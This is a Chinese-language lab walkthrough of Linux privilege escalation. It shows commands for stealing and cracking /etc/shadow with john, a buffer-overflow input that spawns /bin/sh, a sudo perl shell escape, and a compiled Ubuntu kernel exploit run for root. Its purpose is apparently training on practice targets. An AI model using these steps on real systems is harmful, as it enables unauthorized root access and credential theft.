靶场提权记录

目录

1,下载 靶场的  /etc/passwd 文件 和 /etc/shadow 文件 并破解  

2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数  execve())

3,在本地登录 ssh 实现提权

4,使用 perl命令提权

5,利用 ubuntu 4.4.0内核 溢出 提权


1,下载 靶场的  /etc/passwd 文件 和 /etc/shadow 文件 并破解  

download /etc/passwd
download /etd/shadow

直接用 john 进行暴力破解

john shadow

如果不成功,尝试先把文件转换为john可以识别的文件格式:

unshadow password shadow > cracked

john cracked

获得用户名和密码后,先切换到破解出来的用户,然后再切换到root

su - username    //切换到 得到的用户
Password:123123

sudo su 
Password:123123

2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数  execve())

在使用ssh登录后发现 当前目录中有一个 read_message.c 文件

 

靶场提权记录_第1张图片

大致意思: 如果输入的 字符串 的前五个字符 跟 Simon 相同的 就执行 

execve(program,null,null) 执行 usr/local/sbin/message

靶场提权记录_第2张图片

输入Simonaaaaaa 后给了一些提示

那溢出之后 会不会执行我们溢出后的命令呢??(数组的大小为 20 )

试一下:输入 Simonaaaaaaaaaaaaaaa/bin/sh  使程序溢出,从而执行跳转到/bin/sh下

靶场提权记录_第3张图片

我们真的提升了权限,成为了root权限

 

3,在本地登录 ssh 实现提权

如果使用命令执行 在 /home/luoaho  目录下发现了 .ssh 目录就可以使用 

ssh luohao@localhost sudo -l

不需要输入密码就可以提升到 root 权限

4,使用 perl命令提权

查看用户的sudo权限发现可以使用perl命令:

靶场提权记录_第4张图片

使用perl命令提权:
 

sudo perl -e "exec '/bin/sh'"   //运行sh

bash -i //以交互模式运行bash

实例:成功提升到 root权限

靶场提权记录_第5张图片

5,利用 ubuntu 4.4.0内核 溢出 提权

查找漏洞利用代码:

searchsploit ubuntu 4.4.0

靶场提权记录_第6张图片

使用 第三个 41458.c文件

复制41458.c 内核溢出代码 到 桌面, 并将脚本编译成计算机能够执行的文件

cp /usr/share/exploitdb/exploits/linux/local/41458.c /root/desktop/1234.c

gcc 1234.c -o shellroot

将shellroot 上传到 靶机

upload /root/desktop/shellroot

靶场提权记录_第7张图片

然后在shell 命令下 将shellroot 添加可执行权限

chmod 777 shellroot  //赋予文件全部权限

执行shellroot

./shellroot

执行成功 ,已经变成了root权限,可以干坏事了

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(web渗透)